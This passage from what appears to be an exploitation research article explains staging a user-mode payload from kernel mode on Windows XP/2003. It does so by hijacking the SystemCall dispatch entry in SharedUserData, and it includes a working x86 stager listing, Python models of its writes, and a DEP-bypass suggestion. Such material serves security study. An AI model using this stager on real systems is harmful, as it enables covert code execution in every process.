|Informative Information for the Uninformed|
One particularly useful approach to staging an R3 payload from R0 is to hijack the system call dispatcher at R3. Doing so requires an understanding of the basic mechanism through which system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the soft-interrupt 0x2e, so the method described in this subsection will not work on Windows 2000. Starting with XP SP0, however, the system call interface was changed to support processor-specific system call instructions such as sysenter or syscall.
To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call. These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below:
    kd> dt _KUSER_SHARED_DATA 0x7ffe0000
       ...
       +0x300 SystemCall : 0xc819cc3`340fd48b
    kd> u SharedUserData!SystemCallStub L3
    SharedUserData!SystemCallStub:
    7ffe0300 8bd4             mov     edx,esp
    7ffe0302 0f34             sysenter
    7ffe0304 c3               ret
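The two views in the debugger output above show the same bytes. As a minimal sketch (the function name `field_bytes` is an illustrative choice, not something from the original text), the 64-bit value printed by `dt` can be unpacked in little-endian order and compared against the opcode bytes printed by `u`:

```python
import struct

# Value of the SystemCall field as printed by dt (high dword`low dword).
SYSTEM_CALL_FIELD = 0x0C819CC3340FD48B

# Opcode bytes printed by the disassembly of SystemCallStub:
#   8b d4  mov edx,esp
#   0f 34  sysenter
#   c3     ret
STUB_BYTES = bytes.fromhex("8bd4" "0f34" "c3")


def field_bytes(value: int) -> bytes:
    """Return the 8 bytes of the field in memory order (little-endian)."""
    return struct.pack("<Q", value)


if __name__ == "__main__":
    raw = field_bytes(SYSTEM_CALL_FIELD)
    print(raw.hex())                 # 8bd40f34c39c810c
    print(raw[:5] == STUB_BYTES)     # True
```

The first five bytes are the stub itself. The remaining three bytes of the field are whatever follows the `ret` and are not part of the three instructions shown.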
To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location.
    ntdll!ZwAllocateVirtualMemory:
    77f7e4c3 b811000000       mov     eax,0x11
    77f7e4c8 ba0003fe7f       mov     edx,0x7ffe0300
    77f7e4cd ffd2             call    edx
Because SharedUserData contained executable instructions, the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers to routines that resided within ntdll.dll. The output below shows this change:
    +0x300 SystemCall       : 0x7c90eb8b
    +0x304 SystemCallReturn : 0x7c90eb94
    +0x308 SystemCallPad    : 0
To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer:
    ntdll!ZwAllocateVirtualMemory:
    7c90d4de b811000000       mov     eax,0x11
    7c90d4e3 ba0003fe7f       mov     edx,0x7ffe0300
    7c90d4e8 ff12             call    dword ptr [edx]
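The only difference between the two stubs is the final byte of the call: `ff d2` versus `ff 12`. Both use opcode `FF` with a ModRM `reg` field of 2 (the near indirect call form); the `mod` field decides whether `edx` is used as the target itself or as the address of the target. The sketch below decodes just these two cases. The function names are illustrative, and it deliberately rejects addressing forms that do not appear in the stubs.

```python
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def split_modrm(byte: int) -> tuple:
    """Split a ModRM byte into its (mod, reg, rm) fields."""
    return byte >> 6, (byte >> 3) & 7, byte & 7


def describe_ff_call(modrm: int) -> str:
    """Describe an `FF /2` call for the two simple forms used by the stubs."""
    mod, reg, rm = split_modrm(modrm)
    if reg != 2:
        raise ValueError("not an FF /2 (near indirect call) encoding")
    if mod == 3:
        # Register-direct: the register holds the target address.
        return "call " + REG32[rm]
    if mod == 0 and rm not in (4, 5):
        # Register-indirect: the register points at a dword holding the target.
        return "call dword ptr [" + REG32[rm] + "]"
    raise ValueError("addressing form not handled in this sketch")


if __name__ == "__main__":
    print(describe_ff_call(0xD2))   # call edx
    print(describe_ff_call(0x12))   # call dword ptr [edx]
```

In the first form, execution continues at 0x7ffe0300 itself, so that page must be executable. In the second form, 0x7ffe0300 is only read as data.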
The significance of these dispatching mechanisms is that they can be manipulated to stage a payload from R0 to R3 with very little overhead. The basic idea is to layer an R3 payload between the system call stubs and the kernel, so that the R3 payload gets an opportunity to run before a system call is issued within the context of an arbitrary process.
This approach has quite a few advantages. First, the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out, so no migration technique is needed to get the R0 payload to a safe IRQL.
One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to set the execute bit if necessary, thus eliminating the DEP concern.
Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not.
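The re-entrancy requirement can be illustrated with a toy model. This is only a conceptual sketch in Python, not payload code: the class name `SyscallHook`, the process-name check, and the run-once policy are all assumptions made for illustration. The point it shows is that the layered code is entered on every system call from every process, must decide for itself whether to act, and must always pass control on to the original dispatcher.

```python
class SyscallHook:
    """Toy model of code layered in front of the system call dispatcher."""

    def __init__(self, original, payload, target_process):
        self.original = original            # the real dispatcher
        self.payload = payload              # the work to perform once
        self.target_process = target_process
        self.fired = False

    def __call__(self, process, syscall_number):
        if process == self.target_process and not self.fired:
            # Set the flag before running: the payload may itself issue
            # system calls, which re-enter this hook.
            self.fired = True
            self.payload(process)
        # Every call, whether or not the payload ran, is forwarded.
        return self.original(process, syscall_number)
```

Setting the flag before invoking the payload is the design choice that matters here: if the flag were set afterwards, a system call made by the payload would re-enter the hook and run the payload again.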
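The following steps outline one way in which a stager of this type could be implemented.
1. Obtain the address of the R3 payload.
2. Copy the R3 payload into an unused portion of SharedUserData, at offset 0x37c, through the kernel-mode address 0xffdf037c.
3. Determine whether SystemCall at offset 0x300 holds instructions or a function pointer by comparing its first two bytes with 0xd48b (mov edx,esp).
4. If it holds instructions, append code after the copied R3 payload that executes mov edx,esp and jumps to the sysenter instruction at 0x7ffe0302, then overwrite the first two bytes of the stub with a short jump to the copied payload.
5. If it holds a function pointer, save the original pointer in SystemCallPad at offset 0x308, append an indirect jump through the saved pointer after the copied R3 payload, and replace SystemCall with the address of the copied payload.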
The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method.
    00000000  EB3F          jmp short 0x41
    00000002  BB0103DFFF    mov ebx,0xffdf0301
    00000007  4B            dec ebx                ; ebx = 0xffdf0300 (SystemCall)
    00000008  FC            cld
    00000009  8D7B7C        lea edi,[ebx+0x7c]     ; edi = 0xffdf037c (copy destination)
    0000000C  5E            pop esi                ; esi = address of the R3 payload
    0000000D  57            push edi
    0000000E  6A01          push byte +0x1         ; number of dwords to copy
    00000010  59            pop ecx
    00000011  F3A5          rep movsd              ; copy the R3 payload
    00000013  B88BD4B902    mov eax,0x2b9d48b
    00000018  663903        cmp [ebx],ax           ; does SystemCall start with 8b d4 (mov edx,esp)?
    0000001B  7511          jnz 0x2e               ; no: function pointer case
    0000001D  AB            stosd
    0000001E  B803FE7FFF    mov eax,0xff7ffe03
    00000023  AB            stosd
    00000024  B0E1          mov al,0xe1
    00000026  AA            stosb
    00000027  66C703EB7A    mov word [ebx],0x7aeb  ; write eb 7a (jmp short) over the stub
    0000002C  5F            pop edi
    0000002D  C3            ret                    ; substitute with recovery method
    0000002E  8B03          mov eax,[ebx]          ; eax = original SystemCall pointer
    00000030  8D4B08        lea ecx,[ebx+0x8]      ; ecx = address of SystemCallPad
    00000033  8901          mov [ecx],eax          ; save the original pointer
    00000035  66C707FF25    mov word [edi],0x25ff
    0000003A  894F02        mov [edi+0x2],ecx
    0000003D  5F            pop edi
    0000003E  893B          mov [ebx],edi          ; SystemCall = address of copied payload
    00000040  C3            ret                    ; substitute with recovery method
    00000041  E8BCFFFFFF    call 0x2
    ... R3 payload here ...
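To make the effect of the listing easier to follow, the sketch below replays its memory writes against a `bytearray` that stands in for the SharedUserData page. It is a model for reading the listing, not a replacement for it: the names `stage` and `new_page` are illustrative, and the NOP bytes used as a payload in the usage note are placeholders. All constants are taken from the listing and the debugger output above.

```python
import struct

KERNEL_BASE = 0xFFDF0000    # address used by the listing (mov ebx,0xffdf0301 / dec ebx)
SYSTEM_CALL = 0x300         # SystemCall field
SYSTEM_CALL_PAD = 0x308     # SystemCallPad field
PAYLOAD = 0x37C             # copy destination (lea edi,[ebx+0x7c])


def new_page(system_call_bytes: bytes) -> bytearray:
    """Build a zeroed model page with the given bytes at offset 0x300."""
    page = bytearray(0x1000)
    page[SYSTEM_CALL:SYSTEM_CALL + len(system_call_bytes)] = system_call_bytes
    return page


def stage(page: bytearray, payload: bytes) -> None:
    """Replay the stager's writes on `page`."""
    if len(payload) % 4:
        raise ValueError("rep movsd copies whole dwords")
    end = PAYLOAD + len(payload)
    page[PAYLOAD:end] = payload                               # rep movsd

    if page[SYSTEM_CALL:SYSTEM_CALL + 2] == b"\x8b\xd4":      # cmp [ebx],ax
        # Instruction case: stosd, stosd, stosb append nine bytes that
        # decode as mov edx,esp / mov ecx,0x7ffe0302 / jmp ecx.
        trailer = (struct.pack("<I", 0x02B9D48B)
                   + struct.pack("<I", 0xFF7FFE03)
                   + b"\xe1")
        page[end:end + len(trailer)] = trailer
        # mov word [ebx],0x7aeb writes eb 7a, a short jump over 0x7a bytes.
        page[SYSTEM_CALL:SYSTEM_CALL + 2] = struct.pack("<H", 0x7AEB)
    else:
        # Function pointer case: save the pointer in SystemCallPad, append
        # ff 25 <addr> (jmp dword ptr [addr]), then repoint SystemCall.
        original = bytes(page[SYSTEM_CALL:SYSTEM_CALL + 4])
        page[SYSTEM_CALL_PAD:SYSTEM_CALL_PAD + 4] = original
        page[end:end + 2] = struct.pack("<H", 0x25FF)
        page[end + 2:end + 6] = struct.pack("<I", KERNEL_BASE + SYSTEM_CALL_PAD)
        page[SYSTEM_CALL:SYSTEM_CALL + 4] = struct.pack("<I", KERNEL_BASE + PAYLOAD)
```

Running `stage(new_page(bytes.fromhex("8bd40f34c3")), b"\x90" * 4)` leaves `eb 7a 0f 34 c3` at offset 0x300. The short jump lands at 0x300 + 2 + 0x7a = 0x37c, the start of the copied payload, and the appended trailer returns to the untouched sysenter at offset 0x302. In the function pointer case the model stores the 0xffdf... values exactly as the listing does, without interpreting how those addresses relate to the 0x7ffe0000 mapping seen in the debugger output.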